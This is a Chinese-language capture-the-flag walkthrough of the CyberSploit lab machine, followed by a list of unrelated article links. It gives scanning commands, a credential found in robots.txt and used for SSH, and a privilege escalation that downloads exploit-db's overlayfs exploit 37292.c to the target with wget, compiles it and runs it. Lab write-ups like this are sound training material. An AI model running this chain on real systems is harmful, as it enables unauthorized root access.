靶机准备

将ova文件导入虚拟机中,设置网络模式为NAT

从靶机描述得知包含3个flag





kali扫描其ip

netdiscover -r 192.168.164.0/24

渗透测试

namp扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.187



只开放了22、80端口

访问80端口



查看源码,发现信息



扫描一下目录

dirb http://192.168.164.187



发现robots.txt,访问



得到一串密文,尝试base64解码

成功获得flag1



接下来尝试ssh连接

利用刚才获得的username进行尝试猜测密码为flag1:

cybersploit{youtube.com/c/cybersploit}

成功登录



不是root权限



查看一下目录,发现flag2,读取



得到一串二进制数据,可能有用

01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101

使用工具将二进制转文本,获得flag2

提权

先查看系统内核版本

uname -a



是3.13.0-32-generic

查找是否有漏洞

searchsploit overlayfs



下载37292.c文件

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root



在kali开启http服务,靶机下载此文件。

python -m SimpleHTTPServer 8080
靶机:wget http://192.168.164.137:8080/37292.c



gcc编译命令:

gcc 37292.c -o test

执行脚本文件:

./test

提权成功,得到root权限!!!



进入root目录拿到最后一个flag3

cybersploit的更多相关文章

随机推荐

  1. C 静态存储动态存储

    首先,我们可以把程序所占的内存空间分为三个部分:(可以根据静态资源区.栈区.堆区来划分) 静态存储:程序运行期间由系统分配固定得到存储空间(栈): 动态存储:开发者根据自身需要进行动态分配的存储空间( ...

  2. Git脑图

    ps:有时我们想一台有不同的git账号对应不同的git仓库时(gitLab/gitHub)时,除了全局的用户配置定义,我们可以为不同仓库自定义不同用户名和邮件 1.查询全局的配置:git config ...

  3. 多台服务器共享session问题(2)

    多台服务器共享session问题  转载自:https://www.cnblogs.com/lingshao/p/5580287.html 在现在的大型网站中,如何实现多台服务器中的session数据 ...

  4. linux多次登录失败锁定账户

    2021-07-22 1.配置对系统进行失败的ssh登录尝试后锁定用户帐户 # 配置登录访问的限制 vi /etc/pam.d/system-auth 或者 vi etc/pam.d/password ...

  5. CPU内部结构域寄存器

    CPU内部结构域寄存器   64位和32位系统区别: 寄存器是CPU内部最基本的存储单元. CPU对外是通过总线(地址.控制.数据)来和外部设备交互的,总线的宽度是8位,同时CPU的寄存器也是8位,那 ...

  6. Python习题集(十二)

    每天一习题,提升Python不是问题!!有更简洁的写法请评论告知我! https://www.cnblogs.com/poloyy/category/1676599.html 题目 请写一个函数fin ...

  7. Python习题集(十四)

    每天一习题,提升Python不是问题!!有更简洁的写法请评论告知我! https://www.cnblogs.com/poloyy/category/1676599.html 题目 请写一个函数,该函 ...

  8. Appium自动化(11) - 详解 Applications 类里的方法和源码解析

    如果你还想从头学起Appium,可以看看这个系列的文章哦! https://www.cnblogs.com/poloyy/category/1693896.html 前言 Applications 类 ...

  9. PyRevit开发第一步:获取Revit文档Document

    1.安装PythonShell插件 PythonShell 2018 插件下载 交流QQ群: 17075104 新建项目后,运行功能Python Shell, 在弹出的窗口中复制或输入以下引用代码模块 ...

  10. linux 档案权限篇之一

    一:预备知识 1.在linux中,任何一个档案都具有.所有者.用户组.其他用户这三种身份的个别权限. 1.所有者:即档案拥有者,由于Linux是多人多任务的系统,因此可能常常会有很多人同时使用这部主机 ...